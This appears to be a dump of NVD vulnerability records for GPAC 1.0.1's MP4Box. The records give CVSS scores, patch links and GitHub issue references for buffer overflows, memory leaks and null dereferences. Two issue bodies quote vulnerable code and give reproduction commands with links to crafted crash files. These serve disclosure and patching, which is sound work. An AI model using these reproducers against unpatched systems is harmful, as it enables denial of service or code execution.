[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1703
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
[Security]heap buffer overflow issue with gpac MP4Box
https://api.github.com/repos/gpac/gpac/issues/1703/comments
0
2021-03-11T08:32:34Z
2023-09-22T06:12:25Z
https://github.com/gpac/gpac/issues/1703
828,921,799
1,703
1,846
CVE-2021-31255
2021-04-19T19:15:18.140
Buffer overflow in the abst_box_read function in MP4Box in GPAC 1.0.1 allows attackers to cause a denial of service or execute arbitrary code via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/758135e91e623d7dfe7f6aaad7aeb3f791b7a4e5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1733" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/758135e91e623d7dfe7f6aaad7aeb3f791b7a4e5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1733" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/gpac/gpac/issues/1733
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
[Security]heap-buffer-overflow in abst_box_read
https://api.github.com/repos/gpac/gpac/issues/1733/comments
0
2021-04-08T04:06:31Z
2023-09-22T06:12:52Z
https://github.com/gpac/gpac/issues/1733
853,037,318
1,733
1,847
CVE-2021-31256
2021-04-19T19:15:18.203
Memory leak in the stbl_GetSampleInfos function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2da2f68bffd51d89b1d272d22aa8cc023c1c066e" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1705" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2da2f68bffd51d89b1d272d22aa8cc023c1c066e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1705" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/1705
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
[Security]memory leak with MP4Box
https://api.github.com/repos/gpac/gpac/issues/1705/comments
1
2021-03-12T02:25:29Z
2023-09-22T06:16:27Z
https://github.com/gpac/gpac/issues/1705
829,695,046
1,705
1,848
CVE-2021-31257
2021-04-19T19:15:18.267
The HintFile function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/87afe070cd6866df7fe80f11b26ef75161de85e0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1734" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/87afe070cd6866df7fe80f11b26ef75161de85e0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1734" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1734
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
null dereference in MP4Box HintFile
https://api.github.com/repos/gpac/gpac/issues/1734/comments
0
2021-04-08T04:07:59Z
2023-09-22T06:10:12Z
https://github.com/gpac/gpac/issues/1734
853,037,887
1,734
1,849
CVE-2021-31258
2021-04-19T19:15:18.327
The gf_isom_set_extraction_slc function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/ebfa346eff05049718f7b80041093b4c5581c24e" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1706" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/ebfa346eff05049718f7b80041093b4c5581c24e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1706" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1706
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
null dereference issue with MP4Box
https://api.github.com/repos/gpac/gpac/issues/1706/comments
0
2021-03-12T06:50:09Z
2023-09-22T06:13:06Z
https://github.com/gpac/gpac/issues/1706
829,813,689
1,706
1,850
CVE-2021-31259
2021-04-19T19:15:18.373
The gf_isom_cenc_get_default_info_internal function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/3b84ffcbacf144ce35650df958432f472b6483f8" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1735" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/3b84ffcbacf144ce35650df958432f472b6483f8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1735" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1735
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
null dereference in MP4Box gf_isom_cenc_get_default_info_internal
https://api.github.com/repos/gpac/gpac/issues/1735/comments
0
2021-04-08T07:10:40Z
2023-09-22T06:08:25Z
https://github.com/gpac/gpac/issues/1735
853,144,448
1,735
1,851
CVE-2021-31260
2021-04-19T19:15:18.437
The MergeTrack function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/df8fffd839fe5ae9acd82d26fd48280a397411d9" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1736" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/df8fffd839fe5ae9acd82d26fd48280a397411d9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1736" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1736
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
null dereference in MP4Box MergeTrack
https://api.github.com/repos/gpac/gpac/issues/1736/comments
0
2021-04-08T07:11:57Z
2023-09-22T06:09:11Z
https://github.com/gpac/gpac/issues/1736
853,145,443
1,736
1,852
CVE-2021-31261
2021-04-19T19:15:18.517
The gf_hinter_track_new function in GPAC 1.0.1 allows attackers to read memory via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/cd3738dea038dbd12e603ad48cd7373ae0440f65" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1737" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/cd3738dea038dbd12e603ad48cd7373ae0440f65" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1737" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/gpac/gpac/issues/1737
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
[Security]memory leak with MP4Box
https://api.github.com/repos/gpac/gpac/issues/1737/comments
0
2021-04-09T00:56:24Z
2023-09-22T06:11:57Z
https://github.com/gpac/gpac/issues/1737
854,055,228
1,737
1,853
CVE-2021-31262
2021-04-19T19:15:18.577
The AV1_DuplicateConfig function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/b2eab95e07cb5819375a50358d4806a8813b6e50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/b2eab95e07cb5819375a50358d4806a8813b6e50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1738" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1738
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
null dereference in AV1_DuplicateConfig
https://api.github.com/repos/gpac/gpac/issues/1738/comments
0
2021-04-09T00:57:41Z
2023-09-22T06:13:19Z
https://github.com/gpac/gpac/issues/1738
854,055,702
1,738
1,854
CVE-2021-30014
2021-04-19T20:15:14.363
There is a integer overflow in media_tools/av_parsers.c in the hevc_parse_slice_segment function in GPAC 1.0.1 which results in a crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/51cdb67ff7c5f1242ac58c5aa603ceaf1793b788" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1721" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/51cdb67ff7c5f1242ac58c5aa603ceaf1793b788" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1721" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/gpac/gpac/issues/1721
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
There is a integer overflow in media_tools/av_parsers.c:6568, function hevc_parse_slice_segment. Below code: ` pps_id = gf_bs_read_ue_log(bs, "pps_id"); if (pps_id >= 64) return -1; pps = &hevc->pps[pps_id]; sps = &hevc->sps[pps->sps_id]; si->sps = sps; si->pps = pps; ` However, function may return a negative number to pps_id, which smaller than 64. Results a crash in followed execution. In command Line: gpac -info bug4 ![bug4_cmd](https://user-images.githubusercontent.com/44844446/112793142-537b8f00-9097-11eb-922c-a53eb5495b40.png) In gdb: ![bug4](https://user-images.githubusercontent.com/44844446/112793147-55dde900-9097-11eb-92bd-de6cc7749391.png) The crafted file is in the attached zip: [bug4.zip](https://github.com/gpac/gpac/files/6219606/bug4.zip)
A Integer number overflow in function hevc_parse_slice_segment.
https://api.github.com/repos/gpac/gpac/issues/1721/comments
1
2021-03-29T06:03:15Z
2021-03-29T07:46:55Z
https://github.com/gpac/gpac/issues/1721
843,003,944
1,721
1,856
CVE-2021-30015
2021-04-19T20:15:14.427
There is a Null Pointer Dereference in function filter_core/filter_pck.c:gf_filter_pck_new_alloc_internal in GPAC 1.0.1. The pid comes from function av1dmx_parse_flush_sample, the ctx.opid maybe NULL. The result is a crash in gf_filter_pck_new_alloc_internal.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/13dad7d5ef74ca2e6fe4010f5b03eb12e9bbe0ec" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1719" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/13dad7d5ef74ca2e6fe4010f5b03eb12e9bbe0ec" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1719" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1719
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
There is a `Null Pointer Dereference` in function `filter_core/filter_pck.c:104:gf_filter_pck_new_alloc_internal`, The `pid` comes from function `av1dmx_parse_flush_sample`, the `ctx.opid` maybe NULL. Result a crash in `gf_filter_pck_new_alloc_internal`. In command line: gpac -info bug2 ![bug2_cmd](https://user-images.githubusercontent.com/44844446/112789951-d3522b00-9090-11eb-998c-bd212ca0faeb.png) In gdb: ![bug2](https://user-images.githubusercontent.com/44844446/112789958-d5b48500-9090-11eb-8069-571218de0f0a.png) The crafted file is in attach zip: [bug2.zip](https://github.com/gpac/gpac/files/6219469/bug2.zip)
A Null Pointer Dereference In gf_filter_pck_new_alloc_internal
https://api.github.com/repos/gpac/gpac/issues/1719/comments
0
2021-03-29T05:24:39Z
2021-03-29T07:45:00Z
https://github.com/gpac/gpac/issues/1719
842,980,682
1,719
1,857
CVE-2021-30019
2021-04-19T20:15:14.490
